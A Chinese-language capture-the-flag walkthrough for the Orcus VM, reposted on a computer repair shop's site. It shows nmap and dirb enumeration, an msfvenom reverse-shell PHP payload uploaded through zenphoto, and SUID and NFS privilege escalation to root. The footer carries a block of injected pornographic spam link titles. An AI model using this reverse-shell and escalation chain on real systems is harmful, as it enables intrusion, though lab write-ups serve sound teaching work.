錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
挑戰關于Orcus VM的解題步驟

作者: 佚名  日期:2017-05-11 14:51:18   來源: 本站整理

 前言
各位朋友,今天我們將要挑戰的是由Mr. Viper為vulnerable hub設計的“ORCUS”奪旗挑戰賽。本次挑戰賽中包含了4部分:
獲取Shell
獲取root權限
獲取flag
自由發揮尋找隱藏flag
下載傳送門 SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E
探索頻道
192.168.0.151是我們目前已知的目標IP,收集目標信息的第一步就需要進行枚舉,因此使用慣用手法使用nmap掃描其版本。 
nmap -p- -sV 192.168.0.151
從截圖中你可以看出目標開放了許多端口,但我們現在只需要關注80端口就好。 

得知目標開放80端口,因此我們通過瀏覽器打開目標IP 192.168.0.151,但是沒有收獲。 

為了不浪費寶貴時間,我選擇了另一款名為dirb的工具對目錄進行暴力破解。在終端鍵入如下命令: 
dirb http://192.168.0.151
ok大方向正確,并且我們挖出了許多目錄。特別是注意下面截圖中我高亮標注的backups目錄,接下來我們就看看該目錄有沒有驚喜。 

在瀏覽器中鍵入192.168.0.151/backups,其中我發現一個名為simple PHP Quiz-backup.tar.gz的tar文件。下載保存到本地,以供后面分析

解壓后發現其中包含php和html文件,我的小眼睛一瞄,名為db-conn.php的文件其中會不會有數據庫相關的東西呢? 

做了許多努力,最后發現dbuser,dbpasswords分別為數據庫的用戶名和密碼。 

在此之前我們就挖到很多目錄,如果你返回前面截圖還可以注意到phpmyadmin目錄。接著我們在瀏覽器中鍵入192.168.0.1.51/phpmyadmin,鍵入上一步獲得數據庫用戶名以及密碼 

正確輸入用戶名密碼,進入phpmyadmin管理頁面。其中發現名為zenphoto的數據庫,進去瞧瞧吧。 

在zenphoto數據庫中發現一個設置頁面可用于更新數據庫配置文件,在文本框區域填入我們的信息。 

此處,我們填入數據庫用戶名dbuser和數據庫密碼dbpassword,其他直接默認就好 

當點擊頁面下端的GO按鈕便開始安裝,在安裝完成之后會要求你設置管理員賬戶及密碼 

單擊繼續按鈕,同意給出服務條款

創建管理員用戶就不過多敘述,之后點擊頁面頂部的應用按鈕就好。

使用創建的管理員賬戶登錄zenphoto數據庫,進入管理控制臺之后我們可以選擇上傳圖片,但這里我們僅上傳zip文件 

鍵入以下命令,使用msfvenom生成惡意PHP腳本: 

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
從截圖你可以看到生成的惡意PHP腳本,此刻我們需要復制高亮標注的部分代碼。之后將其粘貼到文本文檔,保存為shell.php。最后新建一個文件夾,將shell.php放入其中,然后將其進行壓縮。 最重要的是記得開啟metasploit中的multi handler 

回到瀏覽器以上傳我們的zip文件,之后探尋192.168.0.151/zenphoto/albums內的信息。從下面的截圖中可以看出我們成功上傳shell.php 

單擊shell.php,我們獲得metasploit內的meterpreter會話,鍵入以下命令獲取flag: 
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt
獲得第一個flag 

經過不懈努力,我在kippo文件夾中進一步發現許多信息 
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
獲得第二個flag 

接下來獲取root權限,在文本文檔中引用https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary 中的內容。 之后將其另存為raj.c

上傳編譯好的raj.c文件獲取root權限,如下圖 
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c

從nmap的掃描結果中我們知道目標ip的nfs端口已開放,利用這個點我們可以在Kali Linux中抓取其掛載的tmp數據 
mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj

./raj
Id
Cd /root
Cat flag.txt
獲得第三個flag

最后就靠你自由發揮找到其他flag咯
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 中文字幕av无码一区二区三区电影| 秋霞鲁丝片Av无码少妇| 性色AV蜜臀AV人妻无码| av无码精品一区二区三区四区| 免费无码成人AV片在线在线播放| 中文字幕有码无码AV| 国产丰满乱子伦无码专| 国产精品无码无卡在线播放| 久久AV无码精品人妻出轨| 国产午夜无码精品免费看动漫| 性生交片免费无码看人| 精品无码一区二区三区电影| 国产成年无码AV片在线韩国| 亚洲AV无码一区二区乱子仑| 久久久久亚洲精品无码系列| 亚洲AV无码一区二区三区在线观看| 亚洲美免无码中文字幕在线| 夜夜添无码试看一区二区三区| 日韩乱码人妻无码中文字幕视频| 亚洲精品无码成人| 无码国产精品一区二区免费vr | 亚洲精品无码国产| 嫩草影院无码av| 无码A级毛片日韩精品| 亚洲精品无码aⅴ中文字幕蜜桃| 日韩爆乳一区二区无码| 无码国内精品人妻少妇| 西西午夜无码大胆啪啪国模| 亚洲国产精品无码专区影院 | 亚洲性无码一区二区三区| 无码人妻少妇久久中文字幕蜜桃| 精品久久久无码中文字幕天天| 国产强被迫伦姧在线观看无码 | AV无码久久久久不卡网站下载| 久久久久亚洲AV成人无码网站| 久久久无码精品国产一区| 国产成年无码久久久久毛片| 无码成A毛片免费| 亚洲国产成人无码av在线播放 | 无码任你躁久久久久久久| 日韩人妻无码免费视频一区二区三区 |